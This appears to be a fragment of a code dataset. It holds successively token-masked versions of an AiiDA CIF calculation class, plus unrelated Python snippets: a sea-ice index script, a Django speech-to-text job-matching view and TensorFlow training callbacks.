messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n <function token>\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n<class token>\n"
] | false |
99,863 | 5c377b349b2ddc8fc261932170d2699bb81bf236 | import numpy as np
import xarray as xr
import sys
sys.path.append("../utils/")
from conform_dim import conform_dim
from fourier_filter_high_pass import fourier_filter_high_pass
ds = xr.open_dataset('../data/HadISST_ice.nc')
year_start = 1979
year_end = 2020
year = range(year_start, year_end)
nyears = year_end - year_start + 1
var = ds['sic']
lat = ds['latitude']
lon = ds['longitude']
var_sep = var.sel(time=var.time.dt.month.isin(9)&var.time.dt.year.isin([x for x in range(year_start,year_end)]))
var_oct = var.sel(time=var.time.dt.month.isin(10)&var.time.dt.year.isin([x for x in range(year_start,year_end)]))
var_nov = var.sel(time=var.time.dt.month.isin(11)&var.time.dt.year.isin([x for x in range(year_start,year_end)]))
# SON
SON = (var_sep.values+var_oct.values+var_nov.values) / 3.0
var_son = xr.DataArray(SON, coords=[("time",var_sep['time'].values),("lat",lat.values),("lon",lon.values)])
var_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360
var_son = var_son.sortby(var_son.lon)
var_son = var_son * conform_dim(np.cos(lat.values*np.pi/180.0),var_son,(0,2))
target = var_son.loc[:,80:71,120:225].mean(dim="lon").mean(dim="lat")
ts = target.values
ts = fourier_filter_high_pass(ts, 11)
np.savetxt("idx-filter.txt",ts)
| [
"import numpy as np\nimport xarray as xr\n\nimport sys\nsys.path.append(\"../utils/\")\n\nfrom conform_dim import conform_dim\nfrom fourier_filter_high_pass import fourier_filter_high_pass\n\nds = xr.open_dataset('../data/HadISST_ice.nc')\n\nyear_start = 1979\nyear_end = 2020\nyear = range(year_start, year_end)\nnyears = year_end - year_start + 1\n\nvar = ds['sic']\nlat = ds['latitude']\nlon = ds['longitude']\n\nvar_sep = var.sel(time=var.time.dt.month.isin(9)&var.time.dt.year.isin([x for x in range(year_start,year_end)])) \nvar_oct = var.sel(time=var.time.dt.month.isin(10)&var.time.dt.year.isin([x for x in range(year_start,year_end)])) \nvar_nov = var.sel(time=var.time.dt.month.isin(11)&var.time.dt.year.isin([x for x in range(year_start,year_end)])) \n\n# SON\nSON = (var_sep.values+var_oct.values+var_nov.values) / 3.0\nvar_son = xr.DataArray(SON, coords=[(\"time\",var_sep['time'].values),(\"lat\",lat.values),(\"lon\",lon.values)])\n\nvar_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360 \nvar_son = var_son.sortby(var_son.lon)\n\nvar_son = var_son * conform_dim(np.cos(lat.values*np.pi/180.0),var_son,(0,2))\n\ntarget = var_son.loc[:,80:71,120:225].mean(dim=\"lon\").mean(dim=\"lat\")\n\nts = target.values\n\nts = fourier_filter_high_pass(ts, 11)\n\nnp.savetxt(\"idx-filter.txt\",ts)\n",
"import numpy as np\nimport xarray as xr\nimport sys\nsys.path.append('../utils/')\nfrom conform_dim import conform_dim\nfrom fourier_filter_high_pass import fourier_filter_high_pass\nds = xr.open_dataset('../data/HadISST_ice.nc')\nyear_start = 1979\nyear_end = 2020\nyear = range(year_start, year_end)\nnyears = year_end - year_start + 1\nvar = ds['sic']\nlat = ds['latitude']\nlon = ds['longitude']\nvar_sep = var.sel(time=var.time.dt.month.isin(9) & var.time.dt.year.isin([x for\n x in range(year_start, year_end)]))\nvar_oct = var.sel(time=var.time.dt.month.isin(10) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nvar_nov = var.sel(time=var.time.dt.month.isin(11) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nSON = (var_sep.values + var_oct.values + var_nov.values) / 3.0\nvar_son = xr.DataArray(SON, coords=[('time', var_sep['time'].values), (\n 'lat', lat.values), ('lon', lon.values)])\nvar_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360\nvar_son = var_son.sortby(var_son.lon)\nvar_son = var_son * conform_dim(np.cos(lat.values * np.pi / 180.0), var_son,\n (0, 2))\ntarget = var_son.loc[:, 80:71, 120:225].mean(dim='lon').mean(dim='lat')\nts = target.values\nts = fourier_filter_high_pass(ts, 11)\nnp.savetxt('idx-filter.txt', ts)\n",
"<import token>\nsys.path.append('../utils/')\n<import token>\nds = xr.open_dataset('../data/HadISST_ice.nc')\nyear_start = 1979\nyear_end = 2020\nyear = range(year_start, year_end)\nnyears = year_end - year_start + 1\nvar = ds['sic']\nlat = ds['latitude']\nlon = ds['longitude']\nvar_sep = var.sel(time=var.time.dt.month.isin(9) & var.time.dt.year.isin([x for\n x in range(year_start, year_end)]))\nvar_oct = var.sel(time=var.time.dt.month.isin(10) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nvar_nov = var.sel(time=var.time.dt.month.isin(11) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nSON = (var_sep.values + var_oct.values + var_nov.values) / 3.0\nvar_son = xr.DataArray(SON, coords=[('time', var_sep['time'].values), (\n 'lat', lat.values), ('lon', lon.values)])\nvar_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360\nvar_son = var_son.sortby(var_son.lon)\nvar_son = var_son * conform_dim(np.cos(lat.values * np.pi / 180.0), var_son,\n (0, 2))\ntarget = var_son.loc[:, 80:71, 120:225].mean(dim='lon').mean(dim='lat')\nts = target.values\nts = fourier_filter_high_pass(ts, 11)\nnp.savetxt('idx-filter.txt', ts)\n",
"<import token>\nsys.path.append('../utils/')\n<import token>\n<assignment token>\nnp.savetxt('idx-filter.txt', ts)\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n<code token>\n"
] | false |
99,864 | e3c650c2441e2f348b3ceac3f9e0cdd8297547b8 | import os
from chat.models import Chat, Jobs, Qualified
import speech_recognition as sr
from django.http import HttpResponse
from django.http import JsonResponse
from django.contrib.auth.models import User
from django.shortcuts import render, redirect
def home(request):
chats = Chat.objects.all()
all_users = User.objects.filter(messages__isnull=False).distinct()
ctx = {
'home': 'active',
'chat': chats,
'allusers': all_users
}
if request.user.is_authenticated:
return render(request, 'chat.html', ctx)
else:
return render(request, 'base.html', None)
def upload(request):
customHeader = request.META['HTTP_MYCUSTOMHEADER']
# obviously handle correct naming of the file and place it somewhere like media/uploads/
filename = str(Chat.objects.count())
filename = filename + "name" + ".wav"
uploadedFile = open(filename, "wb")
# the actual file is in request.body
uploadedFile.write(request.body)
uploadedFile.close()
# put additional logic like creating a model instance or something like this here
r = sr.Recognizer()
harvard = sr.AudioFile(filename)
with harvard as source:
audio = r.record(source)
msg = r.recognize_google(audio)
os.remove(filename)
chat_message = Chat(user=request.user, message=msg)
if msg != '':
j = Jobs.objects.all()
msg = msg.lower()
m = msg.split()
for jo in j:
skill = jo.skill.lower()
s = skill.split(',')
ms = set(m)
sk = set(s)
if ms & sk:
q = Qualified(user=request.user, message=jo.user)
q.save()
chat_message.save()
return redirect('/')
def messages(request):
user = request.user
chat = Qualified.objects.filter(user=user)
return render(request, 'messages.html', {'chat': chat, 'user': user})
| [
"import os\nfrom chat.models import Chat, Jobs, Qualified\nimport speech_recognition as sr\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {\n 'home': 'active',\n 'chat': chats,\n 'allusers': all_users\n }\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n\n # obviously handle correct naming of the file and place it somewhere like media/uploads/\n filename = str(Chat.objects.count())\n filename = filename + \"name\" + \".wav\"\n uploadedFile = open(filename, \"wb\")\n # the actual file is in request.body\n uploadedFile.write(request.body)\n uploadedFile.close()\n # put additional logic like creating a model instance or something like this here\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\ndef messages(request):\n user = request.user\n chat = Qualified.objects.filter(user=user)\n return render(request, 'messages.html', {'chat': chat, 'user': user})\n",
"import os\nfrom chat.models import Chat, Jobs, Qualified\nimport speech_recognition as sr\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {'home': 'active', 'chat': chats, 'allusers': all_users}\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\ndef messages(request):\n user = request.user\n chat = Qualified.objects.filter(user=user)\n return render(request, 'messages.html', {'chat': chat, 'user': user})\n",
"<import token>\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {'home': 'active', 'chat': chats, 'allusers': all_users}\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\ndef messages(request):\n user = request.user\n chat = Qualified.objects.filter(user=user)\n return render(request, 'messages.html', {'chat': chat, 'user': user})\n",
"<import token>\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {'home': 'active', 'chat': chats, 'allusers': all_users}\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\n<function token>\n",
"<import token>\n<function token>\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,865 | 65cdb08b814cd913348a5e90b7ebfb34e712fe43 | # !/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import os
from datetime import datetime
import tensorflow as tf
cwd = os.getcwd()
exps_dir = os.path.join(cwd, 'classification_experiments')
if not os.path.exists(exps_dir):
os.makedirs(exps_dir)
now = datetime.now().strftime('%b%d_%H-%M-%S')
model_name = 'CNN'
exp_dir = os.path.join(exps_dir, model_name + '_' + str(now))
if not os.path.exists(exp_dir):
os.makedirs(exp_dir)
callbacks = []
# Model checkpoint
# ----------------
ckpt_dir = os.path.join(exp_dir, 'ckpts')
if not os.path.exists(ckpt_dir):
os.makedirs(ckpt_dir)
ckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(ckpt_dir, 'cp_{epoch:02d}.ckpt'),
save_weights_only=True) # False to save the model directly
callbacks.append(ckpt_callback)
# Visualize Learning on Tensorboard
# ---------------------------------
tb_dir = os.path.join(exp_dir, 'tb_logs')
if not os.path.exists(tb_dir):
os.makedirs(tb_dir)
# By default shows losses and metrics for both training and validation
tb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir,
profile_batch=0,
histogram_freq=1) # if 1 shows weights histograms
callbacks.append(tb_callback)
# Early Stopping
# --------------
early_stop = False
if early_stop:
es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss', patience=10)
callbacks.append(es_callback)
# How to visualize Tensorboard
# 1. tensorboard --logdir EXPERIMENTS_DIR --port PORT <- from terminal
# 2. localhost:PORT <- in your browser | [
